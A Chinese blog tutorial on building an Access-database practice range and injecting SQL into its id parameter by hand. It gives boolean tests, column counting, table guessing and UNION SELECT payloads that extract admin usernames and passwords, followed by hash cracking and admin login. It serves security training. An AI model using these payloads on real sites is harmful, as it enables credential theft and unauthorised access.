ACCESS靶场手工注入(附靶场搭建)

已于 2024-08-20 19:59:58 修改
阅读量334 收藏 3
点赞数 15
文章标签: sql 数据库
于 2024-08-20 17:00:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73771249/article/details/141353554
版权

下载地址:https://pan.baidu.com/s/1y6Gkvo7Wsbwj_zNbaBiCmA 提取码: kjg7

一、靶场搭建

1、将压缩包添到wwwroot目录下

2、 访问iis绑定的ip地址

二、ACCESS注入

1、判断注入点

点击新闻中心,发现一个?id参数   输入' 发现报错,输入' and 1=2, 发现报错,输入' and 1=1,页面正常,说明存在注入点

2、判断列数

输入 ' order by 8 报错,输入 'order by 7 不报错,所以有7列

3、猜测表名

and exists(select * from 表名)

 

4、判断回显位置

union select 1,2,3,4,5,6,7 from 表名

5、猜测字段名

union select 1,username,3,4,5,6,7 from administrator,报错,说明没有usernam字段

union select 1,user_name,3,4,5,6,7 from administrator,页面回显结果,说明有user_name字段

 union select 1,user_name,password,4,5,6,7 from administrator,尝试查看也,页面回显,说明存在password字段

6、将密码进行MD5解密

爆破后台登录地址

输入用户密码登录后台

清星QA
关注
  • 15
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access手工注入靶场环境搭建
2301_82061181的博客
08-20 264
Access手工注入靶场环境搭建
access手工注入靶场环境搭建
qq_45079558的博客
08-20 47
判断字段列数,输入order by 4正常 ,输入order by 5 不正常,判断为4列。输入id=1 and 1=2 union select 1,2,3,4 from admin。将错误发送到浏览器改为‘True’ 将启用父路径改为‘True’将靶场的压缩包解压到当前的根目录下(一键三连截图私聊发靶场压缩包)访问IIS服务器绑定的IP地址,即可访问网站靶场。点击服务器主页下的IIS下的ASP。输入id=1 and 1=1正常。先在电脑的搜索框中搜索IIS。点击应用池下的网站的高级设置。
Access手工注入靶场(环境搭建教程)
2401_82451607的博客
08-20 533
Access手工注入靶场
Access手工注入靶场环境搭建教程)
最新发布
2301_80402555的博客
08-20 286
表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator。1、百度网盘链接:链接:https://pan.baidu.com/s/1Rl-YsRyD6UsvheTfYmHEkw 提取码:sfln。尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin。id=10 and 1=1 页面显示正确。id=10 and 1=2 页面报错。id=10' 页面报错。
Access 靶场环境搭建
08-20
这里就是我们的 Access 靶场资源文件了,只需要我们把zip文件下载下来,并解压就好 ,内包含各种漏洞练习,适用于教育和测试安全专业人员以及开发者的网络安全技能。
DVWA靶场搭建教程,网站搭建
09-06
这个靶场包含了一系列不同级别的漏洞,如SQL注入、XSS攻击、文件包含等,帮助安全专业人员和开发人员了解并防御这些威胁。下面将详细介绍如何搭建DVWA靶场。 首先,我们需要准备以下环境: 1. 服务器或本地机器:...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
手工注入常用SQL语句.txt
07-18
这些知识点主要涉及不同的数据库类型(如Access、MSSQL、MySQL)及其相应的手工注入技巧。以下是对这些知识点的详细解析: ### 1. 手工SQL注入基础概念 在进行手工SQL注入之前,我们需要了解SQL注入的基本原理。...
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 413
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
SQL,将多对多的关联记录按行输出
smilejingwei的博客
08-19 140
要求从两张表中找出符合条件W=100,H=500,D=300的记录,先输出Primay里的一行,再输出相关联的Secondary的每一行。A3:A2为空时返回空,A2不为空时,循环A1的每条记录 ~,合并 ~ 和 A2,最后再合并循环的结果。数据库的Primary表和Secondary表有相同的结构,其中W、H、D是主键。A1、A2:执行简单SQL,条件查询。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 448
【代码】数据库 - 基础。
SQL - 多表查询
心如冰清,天塌不惊
08-18 391
【代码】SQL - 多表查询。
SQL的连接查询与pandas的对应关系
C'mon的博客
08-16 718
SQL和Pandas中,连接查询(join)是处理数据集之间关系的重要工具。
SQLALchemy 数据的 CRUD 操作
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-15 325
SQLAlchemy 是一个流行的 SQL 工具包和对象关系映射(ORM)库,用于 Python。它提供了一个高级接口来与数据库交互,允许开发者通过 Python 对象来执行 CRUD(创建、读取、更新、删除)操作,而无需编写大量的 SQL 语句。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 773
SQL Server 是Microsoft公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
鸿萌数据恢复服务:SQL Server 中的 GAM、SGAM、IAM,及数据库损坏的修复方法
sanyuan7783的博客
08-16 966
全局分配映射 (GAM) 负责处理数据库内的分配区,有助于在需要时识别空闲区。共享分配映射 (SGAM) 页类似于粒度图,处理数据库中特定文件组的扩展分配。索引分配映射 (IAM) 页是特殊的内部页,其作用类似于数据存储的注册表,跟踪数据页在数据库文件中的位置。
Python编码系列—Python SQL与NoSQL数据库交互:深入探索与实战应用
u013889591的专栏
08-17 834
在数据驱动的现代应用开发中,数据库扮演着核心角色。Python作为一种灵活的编程语言,提供了与SQL和NoSQL数据库交互的强大工具。本文将深入探讨Python如何与SQL和NoSQL数据库进行交互,并展示在实际项目中的应用案例。SQL(Structured Query Language)数据库以其结构化查询和事务性操作而广受欢迎。而NoSQL(Not Only SQL数据库则以其灵活的数据模型、水平扩展能力和高性能等特点,应对了大数据和高并发的挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值